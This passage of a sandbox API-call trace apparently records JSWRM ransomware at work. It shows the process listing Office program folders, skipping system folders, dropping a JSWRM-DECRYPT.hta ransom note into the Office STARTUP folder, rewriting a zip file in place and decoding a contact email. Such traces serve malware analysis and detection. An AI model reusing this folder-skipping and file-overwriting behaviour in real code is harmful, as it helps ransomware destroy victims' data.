lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0143.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0143.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0143.886] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd9c8eec, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd9c8eec, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd9ef125, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x254c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ssscreenvvs.dll", cAlternateFileName="SSSCRE~1.DLL")) returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2=".") returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="..") returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="...") returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="windows") returned -1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="recovery") returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="perflogs") returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="documents and settings") returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="system volume information") returned -1 [0143.886] lstrcmpiW (lpString1="ssscreenvvs.dll", lpString2="msocache") returned 1 [0143.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssscreenvvs.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssscreenvvs.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssscreenvvs.dll", lpUsedDefaultChar=0x0) returned 15 [0143.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0143.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssscreenvvs.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssscreenvvs.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssscreenvvs.dll", lpUsedDefaultChar=0x0) returned 15 [0143.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0143.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0143.887] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeda173cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2=".") returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="..") returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="...") returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="windows") returned -1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="recovery") returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="perflogs") returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="documents and settings") returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="$RECYCLE.BIN") returned 1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="system volume information") returned -1 [0143.887] lstrcmpiW (lpString1="STARTUP", lpString2="msocache") returned 1 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0143.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0143.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b768 [0143.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0143.887] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\STARTUP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\startup\\jswrm-decrypt.hta")) returned 0xffffffff [0143.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0143.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0143.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x27b348 [0143.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0143.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27d118 [0143.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0143.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0143.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b1f0 [0143.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0143.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\STARTUP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\startup\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.889] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.890] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0143.890] CloseHandle (hObject=0x45c) returned 1 [0143.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0143.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27d118 | out: hHeap=0x1e0000) returned 1 [0143.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0143.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0143.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0143.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0143.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0143.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b768 [0143.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0143.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\STARTUP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\startup\\jswrm-decrypt.hta")) returned 0x20 [0143.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0143.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0143.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0143.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\STARTUP\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4c6d0c7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0143.891] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.891] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4c6d0c7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0143.891] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.891] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.891] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6d0c7a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4c6d0c7a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4c6d0c7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0143.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0143.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0143.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0143.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0143.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0143.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0143.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0143.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0143.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0143.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0143.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0143.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.892] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6d0c7a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4c6d0c7a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4c6d0c7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0143.892] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0143.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0143.892] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x397278, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="STSLIST.DLL", cAlternateFileName="")) returned 1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2=".") returned 1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="..") returned 1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="...") returned 1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="windows") returned -1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="recovery") returned 1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="perflogs") returned 1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="documents and settings") returned 1 [0143.892] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.893] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="system volume information") returned -1 [0143.893] lstrcmpiW (lpString1="STSLIST.DLL", lpString2="msocache") returned 1 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STSLIST.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STSLIST.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STSLIST.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0143.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0143.893] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237626b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d08, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="System.Windows.Controls.Theming.Toolkit.zip", cAlternateFileName="SYSTEM~1.ZIP")) returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2=".") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="..") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="...") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="windows") returned -1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="recovery") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="perflogs") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="documents and settings") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="$RECYCLE.BIN") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="system volume information") returned 1 [0143.893] lstrcmpiW (lpString1="System.Windows.Controls.Theming.Toolkit.zip", lpString2="msocache") returned 1 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Windows.Controls.Theming.Toolkit.zip", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Windows.Controls.Theming.Toolkit.zip", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.Windows.Controls.Theming.Toolkit.zip", lpUsedDefaultChar=0x0) returned 43 [0143.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Windows.Controls.Theming.Toolkit.zip", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0143.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Windows.Controls.Theming.Toolkit.zip", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.Windows.Controls.Theming.Toolkit.zip", lpUsedDefaultChar=0x0) returned 43 [0143.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0143.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0143.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0143.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0143.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\System.Windows.Controls.Theming.Toolkit.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\system.windows.controls.theming.toolkit.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.895] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11528) returned 1 [0143.895] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d00) returned 0x27b348 [0143.895] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2d00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x2d00, lpOverlapped=0x0) returned 1 [0143.897] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.897] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x2d00, lpOverlapped=0x0) returned 1 [0143.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0143.897] CloseHandle (hObject=0x45c) returned 1 [0143.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0143.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0143.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0143.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0143.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0143.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: 